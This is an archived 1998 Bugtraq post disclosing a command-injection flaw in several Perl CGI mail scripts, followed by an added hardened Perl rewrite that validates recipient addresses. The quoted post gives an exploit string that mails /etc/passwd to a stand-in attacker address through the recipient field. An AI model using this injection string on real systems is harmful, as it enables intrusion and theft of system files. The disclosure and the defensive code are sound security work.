Bugtraq mailing list archives
Re: Several new CGI vulnerabilities
From: avatar () ULTRA ULTRA NET AU (Karl Hanmore)
Date: Tue, 10 Nov 1998 18:45:24 +1000
G'day,

As a related note, the WebCards program (V1.6) by Sam Kareem (webmaster () iraq net) is subject to the same vulnerability.

Regards,
Karl

On Mon, 9 Nov 1998, xnec wrote:
INFO: After looking over the perl-CGI scripts on www.cgi-resources.com, I've discovered vulnerabilities in the following:
-----Snip----8<-----------------
EXPLOIT: Each of these is exploitable by inputting metacharacters into the recipient's email address. Each script calls something similar to:

    open( MAIL, "|$mailprog $email" ) # this particular line is from the LakeWeb scripts

The exploit strings are simple, something like

    &mail evil () foobar com < /etc/passwd&@host.com

will work for each script (the @host.com is necessary because some hosts check for "@" and ".") when placed in the Recipient Email field.
-----Snip-----8<---------------
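A hardened counterpart to the piped open quoted above, as an added example that is not part of the original posts or of any of the scripts named. The sendmail path, the subject line and the helper names `safe_recipient` and `send_card` are assumptions made for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed path; the affected scripts take this from their own $mailprog setting.
my $mailprog = '/usr/sbin/sendmail';

# Allowlist check (hypothetical helper): accept only a conservative address
# alphabet. \A and \z anchor the whole string, so embedded newlines (header
# injection) and shell metacharacters are rejected, as is a leading '-'.
sub safe_recipient {
    my ($email) = @_;
    return undef unless defined $email;
    return $1
        if $email =~ /\A([A-Za-z0-9_+][A-Za-z0-9._+-]*\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+)\z/;
    return undef;
}

# Send without a shell (hypothetical helper): the list form of a pipe open
# execs $mailprog directly, and the recipient travels in the To: header that
# sendmail reads with -t, never on a command line.
sub send_card {
    my ($email, $body) = @_;
    my $rcpt = safe_recipient($email)
        or die "rejected recipient address\n";
    open(my $mail, '|-', $mailprog, '-t', '-oi')
        or die "cannot run $mailprog: $!\n";
    print {$mail} "To: $rcpt\n";
    print {$mail} "Subject: You have a card\n\n";
    print {$mail} $body, "\n";
    close($mail) or die "$mailprog exited with status $?\n";
    return 1;
}

# Constructed inputs: an ordinary address and one in the shape quoted above.
for my $input ('friend@example.com',
               '&mail evil@example.com < /etc/passwd&@host.com') {
    printf "%-50s => %s\n", $input,
        defined safe_recipient($input) ? 'accepted' : 'rejected';
}
```

Checking only for "@" and ".", as the quoted post says some hosts do, does not stop the second input; the anchored allowlist and the shell-free open each do so independently.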